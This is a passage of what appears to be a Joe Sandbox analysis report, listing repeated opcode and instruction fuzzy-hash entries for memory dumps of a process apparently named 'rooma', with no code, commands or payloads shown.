                                                            • Instruction ID: 47ddee41c3efb3c4f97e118837b5bbf147a36cb7740a2d3b7e7e03c9c57eef7c
                                                            • Opcode Fuzzy Hash: b3c60f618da854fd0a15354616aea0aca8a9f3e64ff72aaa9ef0e4676f2a2717
                                                            • Instruction Fuzzy Hash: 9141A932A40206DFDF25DF6CD995BEE7BB0FB98364F040669D511AF291DB349A00CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                            • Instruction ID: 0e9c0452081a80805aa432730dab2f8c18e5c1a638061d9712a5a2516fe2aa2e
                                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                            • Instruction Fuzzy Hash: 45416E31E00212DBEB15EE5884847BEB7F1FB90752F15806BEA60AF241D6329D41C791
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c406b0e7e41d936d4778cec3c4bbc860297e966136e0cc070ea29fdfa500d700
                                                            • Instruction ID: 9d60a4706705bedbc87fdded81d73ecb7450b4e36a4e6139185fb973b2b4ed8b
                                                            • Opcode Fuzzy Hash: c406b0e7e41d936d4778cec3c4bbc860297e966136e0cc070ea29fdfa500d700
                                                            • Instruction Fuzzy Hash: 3541CE726047529FC720DF6CDC40A6AB7E9BFC8700F184A2DF9949B694E730E944C7A6
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                            • Instruction ID: 9e6ab09bb6f76491dca945d1fc6463e241447437b338234968dd061f534165b1
                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                            • Instruction Fuzzy Hash: 6B31D331A54245ABDB118B68CC40BAFBBE9BF54350F0445A6F455DF392D6749884CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 005fe875829c8c41318511fad7e7b28d2ef28853371f56a72ee8f0f26637994b
                                                            • Instruction ID: cd635d42ed05bb2046ec0ce468b13739dd1590afc3084a2626c00546a1ce5ea7
                                                            • Opcode Fuzzy Hash: 005fe875829c8c41318511fad7e7b28d2ef28853371f56a72ee8f0f26637994b
                                                            • Instruction Fuzzy Hash: 423184B5A01229AFDB318B68CC80FDEBBB5BF85714F110199A64DAF280DB309D44CF51
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                            • Instruction ID: 9305338738b328e3343cea0040150bc9eb4d82f0e46e56e24a7e09d0daf9bed0
                                                            • Opcode Fuzzy Hash: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                            • Instruction Fuzzy Hash: 2D41A275200B45DFDB22CF28C981B9A7BEABF45314F04481DE6598F291D774E841CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                            • Instruction ID: 9ee5658d1144f1852847422b420bd2a6c7b32d1fb6cced68064597aac1e3563f
                                                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                            • Instruction Fuzzy Hash: E231F431618246DBE726DE2CC8807ABBBD5BB85750F488529F5C58F281E274C845C792
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b7bf0368e198646c087470732ad61575b90512521b2ed39d8dee8226c44c291
                                                            • Instruction ID: 12289e3790cc9fb1b5c4fb5e5f55094b3ad581446bf14d8f2af371d06bdf05a9
                                                            • Opcode Fuzzy Hash: 1b7bf0368e198646c087470732ad61575b90512521b2ed39d8dee8226c44c291
                                                            • Instruction Fuzzy Hash: 84316532500205AFC721EF18C880A6E7BB9FF85324F504669ED55AF2A1E731ED02CBE0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                            • Instruction ID: 419bc9855d4670d45dba471bb060f7ab3f3a9a5f80f9fb7ba75986456df422fb
                                                            • Opcode Fuzzy Hash: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                            • Instruction Fuzzy Hash: A531A175A0025AEBDB15DF98CC40FAEB7B5FB44B80F858169E900EB254D770ED41CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                            • Instruction ID: 0ed8d8c656f10431c76010a1adf9c5997cad602f54bd229dc1ef175ba2043574
                                                            • Opcode Fuzzy Hash: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                            • Instruction Fuzzy Hash: 2131C071A40606AFDB22AFADCC50B7EB7BABF84755F404169E906DB352DA70DC01CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                            • Instruction ID: af415e29defa61a62dcfa92e45d46fa67d3a56923cbcc74660278cb8de10581a
                                                            • Opcode Fuzzy Hash: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                            • Instruction Fuzzy Hash: CE3181B26053019FE720CF19C840B1BBBE9FB98700F05496DEA849B791D770E848CB92
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                            • Instruction ID: 62d7bc99481dcd288ed4ea1c004f6b0c4a410de75470c5e4eb170a3fe585e93b
                                                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                            • Instruction Fuzzy Hash: 3A312675A04206CFC718CF1CC48495ABBE6FF89354B2985A9EA589B315E730ED06CBD1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                            • Instruction ID: e8d985714a8942c922c8246b987f7541a331f7068884c439e204edc4bd9ad084
                                                            • Opcode Fuzzy Hash: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                            • Instruction Fuzzy Hash: 2231C271B00206DFD720DFA8C9C0AAEBBFABB84304F008529D246DB655D734E941CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                            • Instruction ID: 3306807d3769fbb7afd65c8c25c06551726472650b064380b91b1d50da758804
                                                            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                            • Instruction Fuzzy Hash: 1D319AB160824A8FCB01DF18D840A5ABBE9FF99354F00096DF951DB3A1DB30DC04CBA6
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                            • Instruction ID: 019b7044cf6f597bb313b184c5bd822e45d7ad90d58f1c890e16f88be260d47f
                                                            • Opcode Fuzzy Hash: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                            • Instruction Fuzzy Hash: 9A3149B19402519BDB35AF58CC45B6D7BF4FF90304F4481A9D9859F382EA749981CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                            • Instruction ID: de9f490d128f5786fb6e4ebb5d244d9013a767ea527e7b445266f34cc5ea3445
                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                            • Instruction Fuzzy Hash: 8F21D836602653ABCB25AB958D00ABEBBB5EF90610F40841EFB958A791F734D950C760
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                            • Instruction ID: fe3a8bf4a3efd84b5eaffddbec6fc85d6e73d3d38830d6794b31254efbaaedea
                                                            • Opcode Fuzzy Hash: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                            • Instruction Fuzzy Hash: 6631D831A4012D9BDB31EB18CC42FEE77B9FB55740F0105A1E649BF1A0D6749E808FA0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                            • Instruction ID: 66ab33c9670edfada6e926aa1718c6cbef5dfb5c4339c27f3bf465f0bfcddaec
                                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                            • Instruction Fuzzy Hash: DE217135A00649EFCB15CFA8C990E8EBBB5FF48B14F108069EE159F245D671EA458B90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                            • Instruction ID: 87c50d7f6a57eb73072e724c25bf787449f2e21865c87c76f29d221717bd108a
                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                            • Instruction Fuzzy Hash: 8E318931600605EFE721DBA8C885F6AB7F9FF85354F1049A9E556DB290E730EE01CB50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb073aad2a9103c44668e01e2acc355e0f61a364a78c0ce1af52b7138300c406
                                                            • Instruction ID: 156e4ac93179ccac21ca54236cb278180fa4c44f3de78452f1d5a326965c57ff
                                                            • Opcode Fuzzy Hash: cb073aad2a9103c44668e01e2acc355e0f61a364a78c0ce1af52b7138300c406
                                                            • Instruction Fuzzy Hash: 1821F872944302AFC721EFA8DD40B1B77F8BFA4A58F400929AA45CF690EB20D840C7D6
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                            • Instruction ID: d26dfb39270afed33d30b9c55290c967443fe32528d8fc2622eb1b57c3f5dcd7
                                                            • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                            • Instruction Fuzzy Hash: 5321D4722012019FC719DF19C880BAABBE9FF85365F15416EE1068F391EB70EC01CB94
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                            • Instruction ID: d7898c2948ecda0f022a93478653c16009bdb533968798bff0a03873dd6775a2
                                                            • Opcode Fuzzy Hash: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                            • Instruction Fuzzy Hash: B721AB71600606AFDB15DBACCC40E6AB7A8FF98740F184069F904DB790E738ED40CBA8
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                            • Instruction ID: 7f7490ab3871d4e96a414b02490c872cfa2e7fe13e0f9646b239648c33bd0cec
                                                            • Opcode Fuzzy Hash: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                            • Instruction Fuzzy Hash: 7C21CF729042469BDB11EF59CC44B9BBBDCBF90244F0C8456B980CB265D730C985C6A2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                            • Instruction ID: b3c15b3236f004530e74bd0dae7a09995463f69f81b771620567fc1e79e38741
                                                            • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                            • Instruction Fuzzy Hash: 6521B072644705ABD3269E58DC41B5BBBA5FF88760F00026AF9499B3A0D770E80187A9
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                            • Instruction ID: a49831a8d1085c2829e30a288e6280697b7746f30d199bb15d81aa747c9c2aa4
                                                            • Opcode Fuzzy Hash: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                            • Instruction Fuzzy Hash: 0721AC75250602AFC72ADF69CC00B56B7F5BF48B08F24846CA509CF761E371E842CB94
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                            • Instruction ID: c5b4553483a241f52b8d709cbf56a39646c7e8595cda433e41ac1086949fd8bb
                                                            • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                            • Instruction Fuzzy Hash: F8212632600686CFE7229B9DD898B697BE9BF40284F0904A4EE098F292F734CC40CA51
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                            • Instruction ID: a52da0de00a237fec570c8a361c0cfcf9d772a5a4def2b58937aab115106e541
                                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                            • Instruction Fuzzy Hash: 62119D76601606EFE7229E99DC41FAABBB8FBD0B64F10442DF6049F190E671ED44CB60
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                            • Instruction ID: ae4264008e0431efb1f924fe278661b604875b370e048980796cec4da2cabad1
                                                            • Opcode Fuzzy Hash: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                            • Instruction Fuzzy Hash: 8421AE75A0020ADFCB14CFA8C580AAEBBF5FB89318F20416DD105AB310CB71AD06DBD1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70d516866fedfcc62b81948350387d29c98163cf970cfee36e190da6ca46d445
                                                            • Instruction ID: b6b290ea266045ea5d673701bf28cd0dba4522ec72e7c7c7d8141c987476864e
                                                            • Opcode Fuzzy Hash: 70d516866fedfcc62b81948350387d29c98163cf970cfee36e190da6ca46d445
                                                            • Instruction Fuzzy Hash: C611343A020242BBDB34AF15EC01A7A37E8FFA8B84F105225E9009B354E334DD51CB25
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a83dccc6f12eabda1615d330869676ca913ad4b4b715ead00675bf886fc807ad
                                                            • Instruction ID: 6856d6f2bca732231d0d72ede3fcf236f962e4e13d68f77f83a6b251948e94fe
                                                            • Opcode Fuzzy Hash: a83dccc6f12eabda1615d330869676ca913ad4b4b715ead00675bf886fc807ad
                                                            • Instruction Fuzzy Hash: 5D019672B047066BD720AB6A9CC1FBFB7E8FFD4614F040469E705DB141D6B0E9018661
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b5d38ee73c0717fab7a3006dc43c8baa3414ba249ab66d376effd466f6239a77
                                                            • Instruction ID: 3472a42b02238071411d8080175dfbeb8aa02f2f3ae6c49f38e53ac378d9ea91
                                                            • Opcode Fuzzy Hash: b5d38ee73c0717fab7a3006dc43c8baa3414ba249ab66d376effd466f6239a77
                                                            • Instruction Fuzzy Hash: 5311A071600615AFE721DF68C842B6B77E8FF88304F214829EA85DB211DB35EC009BA2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                            • Instruction ID: 3d5dd3244ffd33f6b76805e7f1141ab5cf7d056e5c3869d5876b5018f258b690
                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                            • Instruction Fuzzy Hash: 0A11E5722416C2DBE723976CC984BAD7BD4FB41788F1D04A6DF419FA92F728C842C250
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca5f4b84066beb345ca01b20fbe83dac21f9da38001861a5c1ace63906cbf6dd
                                                            • Instruction ID: ed6b16ba8b2913c271b9ddfa82e9758e9aac47a7556f0a793b114a7c2723963f
                                                            • Opcode Fuzzy Hash: ca5f4b84066beb345ca01b20fbe83dac21f9da38001861a5c1ace63906cbf6dd
                                                            • Instruction Fuzzy Hash: 5911AC71A016499BC721DF69CC84BAEBBA8BB84640F14046AEA06AB691EB39D901C750
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                            • Instruction ID: b68950714a5a70a6a0624a7636d4e7b2415735ad5757289d009c3d37ac452b6e
                                                            • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                            • Instruction Fuzzy Hash: 3501F57214090BBFE721AF1ACC90E62FB6EFFA1395F404525F2404A5A0C731ECA0CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                            • Instruction ID: edbbc46b62c62522605a151ab69509e8ab13b220221d75151d4d5b8c7b8bef4b
                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                            • Instruction Fuzzy Hash: FF0126314047229BDB319F19D840A3A7BE4FF557607008A6EFD96AF281D331D400CB60
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                            • Instruction ID: 11a565f70b963dbd7b1b5ae44a3b0c653d0f7cfbf62d9948fd8c1d635804f1cc
                                                            • Opcode Fuzzy Hash: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                            • Instruction Fuzzy Hash: 05118B32241642EFDB26EF19DD90F56BBB8FF94B84F200465E9059F6A1C335ED01CA90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                            • Instruction ID: 3e0ce2132b0b441314d494eaa515cce3b17e2f48f1a5f11f8c53a54873b2afaa
